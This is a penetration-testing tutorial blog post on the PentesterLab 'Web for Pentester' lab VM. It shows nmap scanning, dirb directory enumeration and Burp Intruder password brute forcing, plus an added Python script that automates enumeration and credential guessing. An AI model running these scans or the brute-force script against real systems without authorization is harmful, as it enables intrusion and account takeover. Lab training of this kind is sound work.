War Room

Shells from above


CTF Example – Web Application Security Part II

January 26, 2017 By rascuache

In our previous post, we talked about using robots.txt to uncover hidden information about a target website.

By the end of this post you should be able to:

  • Use dirb to spider a website for directory content
  • Use Burp to attempt a brute forcing attack

You will need the following:

  • Kali Linux virtual machine installed and ready to go
  • The Web for Pentester ISO from PentesterLab, booted as a virtual machine in VMware (see the Hacking Tutorial post for setup): https://www.pentesterlab.com/exercises/web_for_pentester/iso

Alright, let’s get started. Find the IP address of the vulnerable website by running ifconfig in the terminal that appears on the booted VM’s console. If you can ping that address from your Kali box and get a response, your networking is set up correctly. If not, you may have to change the VM’s network adapter to bridged or host-only and reboot.

Just as on a real engagement, we start by enumerating the services actually running on the machine we are attacking. Run this as root (the Kali images of the time log you in as root already), since -O and the default SYN scan need raw sockets:

nmap -sV -p- -v -O <ipaddresshere>

You should receive output similar to the following:

Not shown: 65532 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 5.5p1 Debian 6+squeeze3 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.2.16 ((Debian))
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X

If you weren’t already aware, most web applications listen on ports 80 (HTTP) and 443 (HTTPS). They can sit on other ports, most commonly 8080, 8443 and 9090, but those are a little more exotic. Port 389 is also worth noting: that is OpenLDAP, which the /ldap/ exercises we use later in this post authenticate against. Paste the IP address into your browser to see the web application; you should see a page titled Web for Pentester.

Dirb

Hopefully your first instinct was to check robots.txt for interesting entries. Although that will often turn up interesting files and directories, it doesn’t here. We are going to take a much noisier approach this time. On a real penetration test we would use this tool only as a last resort, because every request it makes lands in the web server logs, so it is very easy to detect, and the request rate can accidentally knock over a smaller site. In a terminal window, type the following command:

dirb http://<IPADDRESS>

This tool is designed to help a penetration tester find directories and files that are not linked from the site. It takes a list of common directory names and rapidly requests each one. If the site answers 404, dirb skips that name and prints nothing. If the code is anything else, say 200 (OK), it prints the URL as a hit; 301/302 redirects and 403 Forbidden are printed too, and they still tell you the path exists even if you can’t read it. One caveat: a site that returns 200 for every path (a “soft 404”) will make dirb report every word in its list, so request a deliberately bogus path first and make sure you really get a 404. You should be able to browse to some of these directories and find interesting files.

Brute Forcing with Burp

Now open a new terminal and type burpsuite. Accept the default options and open your web browser. Burp is what is known as a web proxy. This does not mean it’s something you use to reach blocked games from the library. Instead, it sits between your browser and the web server and lets you inspect and edit each request on the fly before it is sent.

Make sure you change the proxy settings in the Iceweasel web browser to point at the Burp proxy listener (127.0.0.1 on port 8080 by default).

If you configured it correctly, browsing to a website will appear to hang. This is normal: Burp’s intercept is on by default, so each request waits in the Proxy > Intercept tab until you look at it and forward or drop it.

Now let’s try and see where this could be useful. Navigate to the following URL in your browser and watch what the request looks like:

http://<IPADDRESS>/ldap/example2.php?name=hacker&password=testpassword

For starters, hit the Forward button and see what happens. The page loads, but it now displays a message saying unauthenticated. Let’s see whether we can use this functionality to guess the password of the account named ‘hacker’.

Make the request in the browser again, but this time don’t forward it straight away. Click inside the request editor, change the value after ‘&password=’ to PIZZA, and then forward it. We were able to change what was sent to the website, but our password was still wrong. Now let’s do this at scale.

Make the request one more time, but this time right-click the intercepted request and choose “Send to Intruder” (or press Ctrl+I).

Clicking the now-highlighted Intruder tab brings you to a new menu. Click “Positions” and you should see your original request, but this time with every parameter value wrapped in § markers. Click “Clear” to remove those markers. What we want is to try many passwords against the same user and see which one makes the response change, so highlight the value after ‘&password=’ and press “Add” to make that the only payload position. Leave the attack type as Sniper, since there is a single position to vary.

When you have it configured as in the screenshot above, click the “Payloads” tab. We want to try a large list of words, so we can either paste them into the box or load them from a text file. There are numerous ways to get large dictionaries; one is rockyou.txt, which was discussed in the Hacking blog. Other common guesses include the season followed by the year, sports teams, names, and the username as the password. For now, let’s type our guesses in manually:

When you are ready, hit Start attack. Intruder will rapidly make one request per payload and tabulate the status code and length of each response. When it has finished, you should see a pane that looks like this:

Notice something interesting? All the failed logins have a response length of 1721, but what about that 7th request? The length is different! On a long list, sorting the results by the Length column makes this kind of outlier jump out. Click on it to see the response:

Looks like we found the right password: the password for hacker is “hacker”, the username itself, which is one of the common guesses listed above.
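Both the dirb run above and the Intruder attack are the same loop underneath: send one request per word, look at the status code or response length, and flag the answers that differ. The script below is an added example that is not part of the original post or of PentesterLab’s material. It accepts any fetch(url) function returning (status, body), so `http_fetch` can be pointed at a real lab VM, while `fake_target` is a constructed stand-in for the Web for Pentester box so it runs offline; the directory names, the 192.168.56.101 address, the candidate passwords and the response bodies are assumptions, not taken from the lab image.

```python
"""Added example (not code from the original post or from PentesterLab): what
dirb and Burp Intruder do under the hood, in plain Python.

Both tools are a loop of "send request, look at status/length". The functions
below accept any fetch(url) -> (status, body) callable. `http_fetch` talks to
a real host; `fake_target` is a constructed stand-in for the Web for Pentester
VM so the script runs offline. The directory names, the 192.168.56.101 address
and the response bodies are assumptions, not taken from the lab image.
"""
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter


def http_fetch(url, timeout=5):
    """Fetch a URL from a real target; returns (status_code, body_bytes)."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:  # 4xx/5xx are still answers we want
        return err.code, err.read()


# Constructed stand-in for the lab VM (assumption: these paths and bodies).
_FAKE_PATHS = {"/ldap/": 200, "/sqli/": 200, "/admin/": 403, "/backup/": 301}
_LAB_PASSWORD = "hacker"  # the post finds this by brute force; hard-coded here


def fake_target(url):
    """Answer like the lab box would: /ldap/example2.php checks name/password,
    a few directories exist, everything else is a 404."""
    parts = urllib.parse.urlsplit(url)
    query = urllib.parse.parse_qs(parts.query)
    if parts.path == "/ldap/example2.php":
        name = query.get("name", [""])[0]
        password = query.get("password", [""])[0]
        if name == "hacker" and password == _LAB_PASSWORD:
            return 200, b"<html>Authenticated as hacker</html>"
        return 200, b"<html>unauthenticated</html>"
    if parts.path in _FAKE_PATHS:
        return _FAKE_PATHS[parts.path], b"<html>index</html>"
    return 404, b"<html>Not Found</html>"


def enumerate_dirs(base, wordlist, fetch):
    """dirb-style: request base/<word>/ for each word and keep every answer
    that is not a 404 (403 and 301 still prove the path exists).
    A bogus path is probed first: a site that answers 200 for everything
    would otherwise turn every word in the list into a false hit."""
    status, _ = fetch(base + "/definitely-not-here-9f3a1c/")
    if status != 404:
        raise RuntimeError(f"bogus path answered {status}; soft-404 target, results would be noise")
    found = {}
    for word in wordlist:
        status, _ = fetch(f"{base}/{word}/")
        if status != 404:
            found[f"/{word}/"] = status
    return found


def brute_force_password(base, user, candidates, fetch):
    """Intruder 'Sniper' attack on the password parameter: one request per
    candidate, then flag responses whose length differs from the common
    (failed-login) length. Returns [(password, length), ...] for the outliers."""
    results = []
    for candidate in candidates:
        qs = urllib.parse.urlencode({"name": user, "password": candidate})
        _, body = fetch(f"{base}/ldap/example2.php?{qs}")
        results.append((candidate, len(body)))
    if not results:
        return []
    failed_len = Counter(length for _, length in results).most_common(1)[0][0]
    return [(pw, length) for pw, length in results if length != failed_len]


def run_demo(fetch=fake_target, base="http://192.168.56.101"):
    """Run both steps against `fetch`; pass fetch=http_fetch for a real lab VM."""
    dirs = enumerate_dirs(base, ["admin", "backup", "images", "ldap", "sqli", "test"], fetch)
    hits = brute_force_password(
        base, "hacker", ["password", "123456", "Winter2017", "PIZZA", "hacker", "letmein"], fetch)
    return dirs, hits


if __name__ == "__main__":
    found_dirs, outliers = run_demo()
    for path, status in found_dirs.items():
        print(f"+ {path} (CODE:{status})")  # same shape as dirb's output lines
    for password, length in outliers:
        print(f"response length changed for password={password!r} ({length} bytes)")
```

Against a real box you would call run_demo(fetch=http_fetch, base="http://<IPADDRESS>"). The length comparison is exactly what the Intruder results table gave us above, and it has the same weakness: if the failure page carries anything dynamic (a timestamp, a CSRF token), every response has a different length and the outlier disappears. In that case match on the response body instead (Intruder’s Grep - Match option, or a check for the word “unauthenticated” in the body here).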

Next steps

This exercise was adapted from the Pentesterlab.com course. Try your hand at some of the other challenges on this machine so you feel comfortable using different tools!

https://www.pentesterlab.com/exercises/web_for_pentester/course


rascuache

Research analyst. Physics geek. Former educator. OSCP
